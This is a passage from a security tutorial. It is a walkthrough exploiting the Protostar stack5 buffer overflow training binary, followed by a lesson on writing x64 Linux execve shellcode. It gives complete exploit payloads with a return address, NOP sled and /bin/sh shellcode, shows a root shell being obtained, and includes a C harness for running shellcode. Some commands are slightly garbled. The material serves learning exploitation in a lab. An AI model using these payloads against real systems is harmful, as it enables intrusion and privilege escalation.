We can see that our nops and SHELLCODE string are at 0xbffff6a0

(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack5 < /tmp/exploit.txt

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/20x $esp
0xbffff6a0: 0x9090  0x9090  0x9090  0x9090  0x9090  0x4853  0x4c45  0x434c
0xbffff6b0: 0x444f  0x0045  0xffff  0xffff  0xeff4  0xb7ff  0x8232  0x0804
0xbffff6c0: 0x0001  0x0000  0xf700  0xbfff

I tried using shellcodes I found on shellstorm. It crashed at the point where it tried to read input. My guess is that bash/dash checks for this and just silently exits when something is wrong with stdin. So I used a shellcode from here. It reopens stdin, so it should work fine.

So we modify exploit.txt file with the correct return address and the shellcode.

$ python -c "print 'A'*76 + '\xa0\xf6\xff\xbf' + '\x90'*10 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" > /tmp/exploit.txt

After running stack5 with exploit.txt as input inside gdb we fall into sh:

(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack5 < /tmp/exploit.txt
Executing new program: /bin/dash
$

The exploit worked in gdb, but when I tried to run it from my console it gave me segfault:

$ /opt/protostar/bin/stack5 < /tmp/exploit.txt
Segmentation fault

After a while, I found out that addresses inside and outside of gdb are different. In particular, the stack addresses in the debugger may not match the addresses during normal execution. This artifact occurs because the operating system loader places both environment variables and program arguments before the beginning of the stack:

For example if we look at variables loaded in gdb we see some artifacts:

(gdb) show env
LC_PAPER=en_GB.UTF-8
LC_ADDRESS=en_GB.UTF-8
LC_MONETARY=en_GB.UTF-8
SHELL=/bin/sh
---CUT OUT---
LC_CTYPE=en_US.UTF-8
LC_TIME=en_GB.UTF-8
LC_NAME=en_GB.UTF-8
OLDPWD=/home/user/peda
_=/usr/bin/gdb
LINES=24
COLUMNS=106

At the end, we can see two variable which is not common for normal execution. To match stacks, I just unset them using the following commands:

(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) show env
LC_PAPER=en_GB.UTF-8
LC_ADDRESS=en_GB.UTF-8
LC_MONETARY=en_GB.UTF-8
SHELL=/bin/sh
---CUT OUT---
LC_CTYPE=en_US.UTF-8
LC_TIME=en_GB.UTF-8
LC_NAME=en_GB.UTF-8
OLDPWD=/home/user/peda
_=/usr/bin/gdb

Now if we run our program in gdb we got error like the previous one. It says we had wrong return address:

(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack5 < /tmp/exploit.txt

Program received signal SIGSEGV, Segmentation fault.
0xbffff6bc in ?? ()

Now we needed to find the correct return address again. We generate new exploit.txt with BBBB instead of return address:

$ python -c "print 'A'*76 + 'BBBB' + '\x90'*10 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" > /tmp/exploit.txt

Don’t forget to unset these environment variables:

(gdb) unset env LINES
(gdb) unset env COLUMNS

Run stack5 with our exploit.txt file and examine stack after the program crashes:

(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack5 < /tmp/exploit.txt

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/10x $esp
0xbffff6c0: 0x90909090  0x90909090  0xc0319090  0x06b0db31
0xbffff6d0: 0x685380cd  0x7974742f  0x65642f68  0x31e38976
0xbffff6e0: 0x12b966c9  0xcd05b027

Our shellcode (which has nops at the beginning) starts at 0xbffff6c0 Thus this address is a return address we need.

There’s a difference between calling ./stac5k and /path/to/stack5: since argv[0] holds the program exactly how you invoked it, you need to ensure equal invocation strings. gdb uses absolute pathes for calling programs. That’s why you need to use /path/to/stack.

Now we can run our exploit:

$ (python -c "print 'A'*76 + '\xc0\xf6\xff\xbf' + '\x90'*10 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'";cat;) | /opt/protostar/bin/stack5
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)
whoami
root

Writing Shellcode for Linux x64

To compile the shellcode, we need the compiler and linker. We will use nasm and ld. To test the shellcode, we will write a small program in C. To compile it we need a gcc. For some tests, we need rasm2, which is a part of the framework radare2. For the writing of auxiliary functions, we will use Python.

What’s new in x64?

x64 is an extension of Intel IA-32 architecture. The main distinguishing feature of this architecture is that it supports the 64-bit general-purpose registers, 64-bit arithmetic and logic operations on integers and 64-bit virtual addresses.

All the 32-bit general-purpose registers remain the same, but they also receive their extended versions: rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp . In addition to these, there are several new general-purpose registers: r8, r9, r10, r11, r12, r13, r14, r15.

Since the addresses are now 64-bit, values on the stack may be 8 bytes long.

A new calling convention was introduced with 64-bit architecture. When you call the function each register is used for a specific purpose, namely:

What is syscall

Syscall is a method that is used by user-mode code to interact with a Linux kernel. It is used for various tasks: IO operation, read/write files, opening/closing programs, working with memory and network, and so on. To perform syscall you need to:

  1. Download the appropriate function in the register rax;
  2. Load the input parameters in other registers;
  3. Call interruption with the number 0x80 (since kernel version 2.6, this is done just by calling syscall).

Unlike Windows where you need to find the address of the required functions, in Linux everything is much simpler.

Syscall functions can be found here.

What is execve?

If you look at shellcodes here, you’ll see many of them use the function execve().

execve() has the following prototype:

int execve(const char * filename, char * const argv[], char * const envp[]);

It calls the program filename. filename program can either be an executable binary or script that begins with the line #! interpreter [optional-arg].

argv[] is a pointer to the array, and this is the argv [], which we see in C, Python, etc.

envp[] is a pointer to the array, describing the environment. In this case, not used, it will be set to null.

Basic requirements

We are going to write a position-independent code so that our shellcode could run anywhere in the program. Position-independent code is a code that can be executed regardless of what address it is loaded on.

Shellcodes use functions like strcpy(). These functions use the bytes 0x00, 0x0A, 0x0D as separators (depending on the platform and a function). Therefore, it is better to avoid such values. Otherwise, a function can copy our shellcode incompletely. Consider the following example:

rasm2 -a x86 -b 64 'push 0x00'
6a00

As you can see, the code push 0x00 compiled into the following bytes 6a 00. If we used this code, our shellcode would not have worked because function strcpy would only copy bytes until 0x00.

The shellcode can not use hardcoded addresses because we do not know these addresses in advance. For this reason, all addresses in the shellcode are obtained dynamically and stored on the stack.

Combining it all

The first step is to prepare options for the function execve() and then properly arrange them on the stack. The function prototype will be:

execve("/bin/sh/", ["/bin/sh"], null);

The second parameter is an array of argv[]. The first element of the array contains the path to the executable file.

The third parameter is the information about the environment, we do not need it, so it will be null.

First, we obtain a zero byte. We can not use code like mov eax, 0x00, because it leads to a null-byte code, so we use the following statement, which does the same thing:

xor rdx, rdx

We cab leave the value in register rdx, since we need the null value as the end value of the third parameter and as a string terminator (null byte).

To invert the string and translates it to hex you can use this python function:

def rev_str(s):
    rev = s[:: - 1]
    return rev.encode("hex")

Call this function to /bin/sh:

>>> rev.rev_str("/bin/sh")
'68732f6e69622f'

This string is 7 bytes long. Now, consider what would happen if we tried to put it into the stack:

rasm2 -a x86 -b 64 'mov rax, 68732f6e69622f; push rax'
48b82f62696e2f73680050

There is a zero byte that would break our shellcode. To avoid this, we can use the fact that Linux ignores successive slashes (e.g. /bin/sh and/bin//sh are the same thing).

>>> rev.rev_str("/bin//sh")
'68732f2f6e69622f'

Now, we have a string of 8 bytes. Let’s see what happens if we put it in the stack:

rasm2 -a x86 -b 64 'mov rax, 0x68732f2f6e69622f; push rax'
48b82f62696e2f2f736850

No zero bytes.

Then we look for information about the function execve(). We need a function number that we put in the rax. execve has a number 59. Let’s see what registers are used by this function:

Now, we assemble all the pieces together.

Push newline character (remember that all is done in reverse order):

xor rdx, rdx
push rdx

Push line /bin//sh:

mov rax, 0x68732f2f6e69622f
push rax

We get the address of the string /bin//sh from rsp and immediately put it in rdi:

mov rdi, rsp

The rsi needs to contain a pointer to an array of strings. In our case, this array will contain only the path to the executable file, so it is enough to put the address that contains the address of the string (in C language, pointer to a pointer). We already have this address. It was saved in the register rdi. The array must be terminated by argv null-byte, which we stored in the register rdx. So we can do:

push rdx
push rdi
mov rsi, rsp

Now rsi indicates the address on the stack, which is a pointer to the string /bin//sh.

Now we put the number of function execve() in rax:

xor rax, rax
mov al, 0x3b

We should have a file like this:

; runs /bin/sh

section .text
    global _start

_start:

    xor rdx, rdx
    push rdx
    mov rax, 0x68732f2f6e69622f
    push rax
    mov rdi, rsp
    push rdx
    push rdi
    mov rsi, rsp
    xor rax, rax
    mov al, 0x3b
    syscall

Let’s compile and link it for x64. For this:

nasm -f elf64 example.asm
ld -m elf_x86_64 -s -o example example.o

Now, we can use objdump -d example to see the resulting file:

Disassembly of section .text:
0000000000400080 <.text>:
400080: 48 31 d2 xor %rdx, %rdx
400083: 52 push %rdx
400084: 48 b8 2f 62 69 6e 2f movabs $0x68732f2f6e69622f, %rax
40008b: 2f 73 68 40008e: 50 push %rax
40008f: 48 89 e7 mov %rsp, %rdi
400092: 52 push %rdx
400093: 57 push %rdi
400094: 48 89 e6 mov %rsp, %rsi
400097: 48 31 c0 xor %rax, %rax
40009a: b0 3b mov $0x3b, %al
40009c: 0f 05 syscall

We can use the following Bash one-liner to get a shellcode like \x11\x22 ... from the binary:

for i in `objdump -d example | tr '\t' '' | tr '' '\n' | egrep '^[0-9a-f]{2}$' '; do echo -n "\x $ i"; done

The result is:

\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50
\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05

Testing shellcode

We can use the following C program (replace the string SHELLCODE with your shellcode) to test the shellcode,:

/* Shellcode test program */
char shellcode[] = "SHELLCODE";
int main () {
    void(*f)() = (void(*)())shellcode; f(); return 0;
}

Then compile:

gcc -m64 -fno-stack-protector -z execstack -o shellcode_test shellcode_test.c

The resulting program is shellcode_test. When you run the program, you should get sh.